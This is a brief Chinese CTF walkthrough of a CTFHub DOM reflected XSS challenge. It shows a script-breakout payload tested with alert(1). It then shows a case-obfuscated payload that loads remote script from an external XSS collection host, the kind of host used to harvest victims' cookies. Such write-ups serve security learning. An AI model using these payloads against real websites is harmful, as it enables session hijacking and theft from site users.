根据框里的内容 直接右键查看网页源代码 看到 了其闭合方式
然后去网页测试一下alert(1)反射
';</script><script>alert(1)</script>
看到 确实存在 去xssaq.cn
创建一个项目 把src粘过来 在第一个输入框中 再将返回回来的url 复制粘贴到第二个 输入框中
';</script><sCRiPt sRC=//xs.pe/Eoo></sCrIpT>
CTFHub技能树web——XSS——DOM反射
A 八方2024-08-06 21:41
相关推荐
子兮曰12 小时前
OpenClaw入门:从零开始搭建你的私有化AI助手吴仰晖12 小时前
使用github copliot chat的源码学习之Chromium Compositor1024小神12 小时前
github发布pages的几种状态记录不像程序员的程序媛14 小时前
Nginx日志切分北原_春希14 小时前
如何在Vue3项目中引入并使用Echarts图表尽意啊14 小时前
echarts树图动态添加子节点吃面必吃蒜14 小时前
echarts 极坐标柱状图 如何定义柱子颜色O_oStayPositive14 小时前
Vue3使用ECharts竹秋…14 小时前
echarts自定义tooltip中的内容宝贝露.14 小时前
Axure引入Echarts图无法正常显示问题